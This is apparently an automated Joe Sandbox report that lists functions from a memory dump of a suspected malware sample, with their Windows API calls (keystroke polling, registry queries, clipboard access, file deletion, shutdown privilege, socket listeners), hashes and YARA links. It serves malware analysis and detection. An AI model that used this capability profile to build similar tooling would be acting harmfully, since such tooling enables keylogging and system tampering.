Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID: 3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_
API String ID: 0-4228276721
Opcode ID: a8fdfaea121b7815b4647b291fd729f4cdeb27f4ddd718d1f7fcffd18dba0b6c
Instruction ID: 7f3c2776e791be17115435356794561f97e86d3b81f345ce9889b4d65bd2af83
Opcode Fuzzy Hash: a8fdfaea121b7815b4647b291fd729f4cdeb27f4ddd718d1f7fcffd18dba0b6c
Instruction Fuzzy Hash: C8727E71E00259CBDB14CF59C8807EEB7B5FF49314F1491AAE809FB291E730A981DB90

Function 00EF001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00EF0097
SetKeyboardState.USER32(?), ref: 00EF0102
GetAsyncKeyState.USER32(000000A0), ref: 00EF0122
GetKeyState.USER32(000000A0), ref: 00EF0139
GetAsyncKeyState.USER32(000000A1), ref: 00EF0168
GetKeyState.USER32(000000A1), ref: 00EF0179
GetAsyncKeyState.USER32(00000011), ref: 00EF01A5
GetKeyState.USER32(00000011), ref: 00EF01B3
GetAsyncKeyState.USER32(00000012), ref: 00EF01DC
GetKeyState.USER32(00000012), ref: 00EF01EA
GetAsyncKeyState.USER32(0000005B), ref: 00EF0213
GetKeyState.USER32(0000005B), ref: 00EF0221

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 0ab5b3c769b0fa6340f6b9d3ea47f2193bef020e77fb43cd11edcd1ce0119b28
Instruction ID: cb7138913ae58a3b4e5dfd7ac431f00d19a50aaa0632bad5b31e17823aeba675
Opcode Fuzzy Hash: 0ab5b3c769b0fa6340f6b9d3ea47f2193bef020e77fb43cd11edcd1ce0119b28
Instruction Fuzzy Hash: 7751F730A0578C69FB35DBA088547FABFF49F01384F08959AC6C6661C3DAA49B8CC761

Function 00F103DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F10E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F0FDAD,?,?), ref: 00F10E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F104AC

Part of subcall function 00E99837: __itow.LIBCMT ref: 00E99862
Part of subcall function 00E99837: __swprintf.LIBCMT ref: 00E998AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F1054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F105E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F10822
RegCloseKey.ADVAPI32(00000000), ref: 00F1082F

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: f865ed82c5af6138a7f32a7b8df7d8a9d881811245b579cf75d711ac0e1179d6
Instruction ID: 0d08e46578f33497796bf2bb7b3e6865d542c18189a1ebf736a73a523e492ff3
Opcode Fuzzy Hash: f865ed82c5af6138a7f32a7b8df7d8a9d881811245b579cf75d711ac0e1179d6
Instruction Fuzzy Hash: 7BE16071604204AFCB14DF28C891E6ABBE5FF89324F04856DF849DB262DB70ED45DB91

Function 00F083BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E99837: __itow.LIBCMT ref: 00E99862
Part of subcall function 00E99837: __swprintf.LIBCMT ref: 00E998AC

CoInitialize.OLE32 ref: 00F08403
CoUninitialize.OLE32 ref: 00F0840E
CoCreateInstance.OLE32(?,00000000,00000017,00F22BEC,?), ref: 00F0846E
IIDFromString.OLE32(?,?), ref: 00F084E1
VariantInit.OLEAUT32(?), ref: 00F0857B
VariantClear.OLEAUT32(?), ref: 00F085DC

Strings

Invalid parameter, xrefs: 00F084FA
Failed to create object, xrefs: 00F08479, 00F0852F
NULL Pointer assignment, xrefs: 00F084B3

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: d65eb2ff563677acb2935a902e94f02fa0a55e1704d934b1383810ab7b42e1b9
Instruction ID: 507c5e2eeaba753b9318c37ca2db748f8be726edd4155f0c3d75b9d5eba3b388
Opcode Fuzzy Hash: d65eb2ff563677acb2935a902e94f02fa0a55e1704d934b1383810ab7b42e1b9
Instruction Fuzzy Hash: 53619C716083129FC710DF14C849B6EBBE8AF497A4F04441DF981AB2D1DB70ED4AEB92

Function 00F04164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00F0418B
EmptyClipboard.USER32 ref: 00F04191
GlobalAlloc.KERNEL32(00000002,?), ref: 00F041A6
CloseClipboard.USER32 ref: 00F04245

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 287b8c688230b08ec53ad56a9e5c105bc359f578b8cec10b632cc0a01f900313
Instruction ID: a4749fe4df34e983a092ac5261ec741636bcb58785064bd9c331ace87ff12568
Opcode Fuzzy Hash: 287b8c688230b08ec53ad56a9e5c105bc359f578b8cec10b632cc0a01f900313
Instruction Fuzzy Hash: 0921A3757002189FDB11AF64DC09BAD7BE8EF45761F118029FA46DB2A2DB70BC00EB54

Function 00EF37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E94743,?,?,00E937AE,?), ref: 00E94770

Part of subcall function 00EF4A31: GetFileAttributesW.KERNEL32(?,00EF370B), ref: 00EF4A32

FindFirstFileW.KERNEL32(?,?), ref: 00EF38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00EF394B
MoveFileW.KERNEL32(?,?), ref: 00EF395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00EF397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00EF399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00EF39B9

Strings

\*.*, xrefs: 00EF384E, 00EF3857, 00EF386C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 8986f473a014bf559fd6dc3820942eec0f705e386c9521f73b02a4a13848a72a
Instruction ID: 2492074e3ae71f3c5b540b3749e23e8270458de05595390a5c422635bed3ceb5
Opcode Fuzzy Hash: 8986f473a014bf559fd6dc3820942eec0f705e386c9521f73b02a4a13848a72a
Instruction Fuzzy Hash: 70519C7180514DAACF05EBB0CA929FDB7B9AF54304F606069E446B7192EF716F0DCB60

Function 00EFF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EFF440
Sleep.KERNEL32(0000000A), ref: 00EFF470
_wcscmp.LIBCMT ref: 00EFF484
_wcscmp.LIBCMT ref: 00EFF49F
FindNextFileW.KERNEL32(?,?), ref: 00EFF53D
FindClose.KERNEL32(00000000), ref: 00EFF553

Strings

*.*, xrefs: 00EFF425

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 90e61e67c803d49e05139980f3c215779f6cfd16a8a5b7721b937b93db5daa75
Instruction ID: 7c7711c51feb64f136166c2a03a6925d2b77ceaa6f05af3130bd894fd0811714
Opcode Fuzzy Hash: 90e61e67c803d49e05139980f3c215779f6cfd16a8a5b7721b937b93db5daa75
Instruction Fuzzy Hash: DF416A7190020EABDF14EF64CC45AFEBBB4FF05314F145466E919B2291EB309E88DB50

Function 00EA3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

_, xrefs: 00EA3322
3c, xrefs: 00EA3225

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3c$_
API String ID: 674341424-4099079164
Opcode ID: 3a9eda5bc7f3fedccc2e4c42bdf1f589f3a2ad8bb54e9356fb2646177d9a5637
Instruction ID: 2028e12336285a75b93d8442dfa48f73e46131e9307608115919d895ad69bdb2
Opcode Fuzzy Hash: 3a9eda5bc7f3fedccc2e4c42bdf1f589f3a2ad8bb54e9356fb2646177d9a5637
Instruction Fuzzy Hash: 80227C716083009FCB24DF24C881BAEB7E5EF89714F10591DF89AAB391DB71E905CB92

Function 00EA5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EA58A5
_memmove.LIBCMT ref: 00EA58F5
_memmove.LIBCMT ref: 00EA595B

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 81bc6ae4b620f9b6a64c4bd198375d341f3152819fb54c2032b43bbb1332ca11
Instruction ID: 9bf61978edcde516760b34119a850e30e8663b665065c823f1c9baaf6032fc75
Opcode Fuzzy Hash: 81bc6ae4b620f9b6a64c4bd198375d341f3152819fb54c2032b43bbb1332ca11
Instruction Fuzzy Hash: D612AA71A00609DFDF04DFA5D981AEEB7F5FF48300F106529E846BB2A0EB35A954CB50

Function 00EF3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E94743,?,?,00E937AE,?), ref: 00E94770

Part of subcall function 00EF4A31: GetFileAttributesW.KERNEL32(?,00EF370B), ref: 00EF4A32

FindFirstFileW.KERNEL32(?,?), ref: 00EF3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00EF3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00EF3BEA
FindClose.KERNEL32(00000000), ref: 00EF3C01
FindClose.KERNEL32(00000000), ref: 00EF3C0A

Strings

\*.*, xrefs: 00EF3B5B

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 20fd4c00b99a718ff3cbf397f26d53cee82718e033653dfe48c8a528cbd99285
Instruction ID: 5c3c36255042a7ad35531814009ccf4a4ce9bc96f6f9266993293b45f95ef745
Opcode Fuzzy Hash: 20fd4c00b99a718ff3cbf397f26d53cee82718e033653dfe48c8a528cbd99285
Instruction Fuzzy Hash: 47316D7101D3899BC701EB64C8958BFB7E8AE95304F406D2DF4E5A2192EB219A0DD763

Function 00EF51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EE882B
Part of subcall function 00EE87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EE8858
Part of subcall function 00EE87E1: GetLastError.KERNEL32 ref: 00EE8865

ExitWindowsEx.USER32(?,00000000), ref: 00EF51F9

Strings

SeShutdownPrivilege, xrefs: 00EF51C9
@, xrefs: 00EF51EC
, xrefs: 00EF51E7

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 5d1696aa8c63fcf016894e5a61ce63a8692edd6974fbfb96743844450671dd77
Instruction ID: dadf0a3dd41934931869caf9e5b168e25f10095088c6de6ec85b3ad2d718cc47
Opcode Fuzzy Hash: 5d1696aa8c63fcf016894e5a61ce63a8692edd6974fbfb96743844450671dd77
Instruction Fuzzy Hash: C2012033791A1D5BF7285274AC5AFFB72B8E715344F242625FF07F20E1DA515C014590

Function 00F06283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F062DC
WSAGetLastError.WSOCK32(00000000), ref: 00F062EB
bind.WSOCK32(00000000,?,00000010), ref: 00F06307
listen.WSOCK32(00000000,00000005), ref: 00F06316
WSAGetLastError.WSOCK32(00000000), ref: 00F06330
closesocket.WSOCK32(00000000,00000000), ref: 00F06344

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 62daa114394cacff11f8e27cde6572eeca75bdbebd5ad1537ad2a79254f8e9f6
Instruction ID: 47b250609d802e3245ff99272c8c7fc9ee6f3b9d858b2b2b7ad7545b3a42c715
Opcode Fuzzy Hash: 62daa114394cacff11f8e27cde6572eeca75bdbebd5ad1537ad2a79254f8e9f6
Instruction Fuzzy Hash: 1D219C316002089FCB14EF68C846B6EB7E9EF49720F158169E816E73D2CB70AD05EB91

Function 00EA5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00EB0DB6: std::exception::exception.LIBCMT ref: 00EB0DEC
Part of subcall function 00EB0DB6: __CxxThrowException@8.LIBCMT ref: 00EB0E01

_memmove.LIBCMT ref: 00EE0258
_memmove.LIBCMT ref: 00EE036D
_memmove.LIBCMT ref: 00EE0414

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: f6aa1e29f7e7a5a946a4a695492f7dca60e97d536c4d436db5ac61cdcc173377
Instruction ID: 6dad16ebf22a9f0dd998be690b0cdc2be32e3ae840ed67e5754b43096082a689
Opcode Fuzzy Hash: f6aa1e29f7e7a5a946a4a695492f7dca60e97d536c4d436db5ac61cdcc173377
Instruction Fuzzy Hash: 3E02C071A00209DBCF04DF65D981AAE7BF5EF49300F149069E80AFF2A5EB75E954CB90

Function 00E91287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00E92612: GetWindowLongW.USER32(?,000000EB), ref: 00E92623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00E919FA
GetSysColor.USER32(0000000F), ref: 00E91A4E
SetBkColor.GDI32(?,00000000), ref: 00E91A61

Part of subcall function 00E91290: DefDlgProcW.USER32(?,00000020,?), ref: 00E912D8

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 214e24c4a6b943c7db44a9625a6d3e462a40a1295344a36724df59a970b766f3
Instruction ID: 5e56ce342f3b1108a8f91d9e375cca5463c97d4097a882a7bfb8674e0e8b37de
Opcode Fuzzy Hash: 214e24c4a6b943c7db44a9625a6d3e462a40a1295344a36724df59a970b766f3
Instruction Fuzzy Hash: EEA1ADB010254ABAEF28AB294C55FFF359DDF8234AF14214DF502F6192CB65DD42E2B1

Function 00EFBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00EFBCE6
_wcscmp.LIBCMT ref: 00EFBD16
_wcscmp.LIBCMT ref: 00EFBD2B
FindNextFileW.KERNEL32(00000000,?), ref: 00EFBD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00EFBD6C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: d0670abd8f73d4f8da8cc628d7305e4a7faf95da0da2d552590f611dffa1d613
Instruction ID: 4116cfaaaa9903c81bc3419bb76886725684b87b8c98aa4c9b387a1fc98eaa62
Opcode Fuzzy Hash: d0670abd8f73d4f8da8cc628d7305e4a7faf95da0da2d552590f611dffa1d613
Instruction Fuzzy Hash: BA51AD756046069FCB18DF28C491EAAB3E4EF49324F10561DEA56A73A1DB31ED04CB92

Function 00F06747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F07DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F0679E
WSAGetLastError.WSOCK32(00000000), ref: 00F067C7
bind.WSOCK32(00000000,?,00000010), ref: 00F06800
WSAGetLastError.WSOCK32(00000000), ref: 00F0680D
closesocket.WSOCK32(00000000,00000000), ref: 00F06821

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 5fc7116259b2385f353094f8e2d90073ca5b7d78cdb2201645ccfc5be12c0c89
Instruction ID: 6fe770a068e54a9ef9f76f69729b8d0561ee5bb93f16c37d926c12ea4c3010ad
Opcode Fuzzy Hash: 5fc7116259b2385f353094f8e2d90073ca5b7d78cdb2201645ccfc5be12c0c89
Instruction Fuzzy Hash: C6419E75A00214AFDF24AF688C86F7E77E89B09724F04845CF919AB3D3DA749D009792

Function 00F15376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00F153C5
IsWindowEnabled.USER32 ref: 00F153D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00F153E0
IsIconic.USER32 ref: 00F153EE
IsZoomed.USER32 ref: 00F153FC

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

